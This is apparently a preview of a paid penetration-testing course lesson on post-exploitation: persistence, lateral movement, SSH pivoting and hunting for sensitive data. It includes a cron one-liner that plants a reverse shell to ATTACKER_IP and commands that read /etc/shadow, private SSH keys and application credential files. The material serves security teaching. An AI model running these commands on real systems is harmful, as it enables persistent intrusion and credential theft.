You are viewing a free preview of this lesson.
Subscribe to unlock all 10 lessons in this course and every other course on LearningBro.
Post-exploitation is what happens after gaining initial access. It demonstrates the true impact of a vulnerability by showing how far an attacker could go. Professional reporting then translates these technical findings into actionable recommendations for the organisation.
| Objective | Description |
|---|---|
| Maintain access | Establish persistent backdoors |
| Escalate privileges | Move from user to administrator/root |
| Lateral movement | Pivot to other systems on the network |
| Data discovery | Find sensitive data, credentials, configurations |
| Data exfiltration | Demonstrate that data can be extracted |
| Cover tracks | Understand how attackers hide their activity |
Tip: In ethical hacking, post-exploitation must stay within the agreed scope. Document everything and avoid unnecessary data access or system modifications.
Persistence ensures continued access if the initial entry point is patched:
| Technique | Platform | Description |
|---|---|---|
| Cron jobs | Linux | Schedule a reverse shell to connect periodically |
| SSH keys | Linux | Add attacker's public key to ~/.ssh/authorized_keys |
| Scheduled tasks | Windows | Use Task Scheduler for persistent execution |
| Registry run keys | Windows | Add entries to auto-start on login |
| Web shells | Web servers | Upload a PHP/ASP shell to the web root |
| Service creation | Windows | Create a service that runs attacker code |
| Startup scripts | Linux | Add commands to .bashrc, .profile, or init scripts |
# Add a reverse shell that connects every 5 minutes
(crontab -l; echo "*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'") | crontab -
Moving from a compromised system to other systems on the network:
| Technique | Description | Tools |
|---|---|---|
| Pass the Hash | Use captured NTLM hashes to authenticate | CrackMapExec, Mimikatz |
| Pass the Ticket | Use Kerberos tickets for authentication | Mimikatz, Rubeus |
| PSExec | Remote command execution on Windows | Sysinternals PsExec, Impacket |
| WMI | Windows Management Instrumentation for remote execution | wmiexec |
| SSH pivoting | Tunnel through compromised hosts | SSH port forwarding |
| RDP | Remote desktop to other Windows systems | xfreerdp, rdesktop |
Pivoting uses a compromised host as a bridge to reach otherwise inaccessible networks:
graph LR
A["Attacker Machine"] --> B["Compromised Host (DMZ)<br/>10.0.0.5"]
B --> C["Internal Server<br/>10.10.0.100"]
A -. "Cannot reach 10.10.0.100 directly; pivot through 10.0.0.5" .-> C
# SSH local port forwarding
ssh -L 8080:10.10.0.100:80 user@10.0.0.5
# SSH dynamic port forwarding (SOCKS proxy)
ssh -D 9050 user@10.0.0.5
# Using proxychains with the SOCKS proxy
proxychains nmap -sT -p 80,443 10.10.0.100
Find valuable data on compromised systems:
# Search for configuration files with passwords
grep -r "password" /etc/ /var/www/ /opt/ 2>/dev/null
# Find SSH keys
find / -name "id_rsa" -o -name "id_ed25519" 2>/dev/null
# Check for database credentials
cat /var/www/html/.env
cat /var/www/html/wp-config.php
# Read the shadow file (if root)
cat /etc/shadow
Subscribe to continue reading
Get full access to this lesson and all 10 lessons in this course.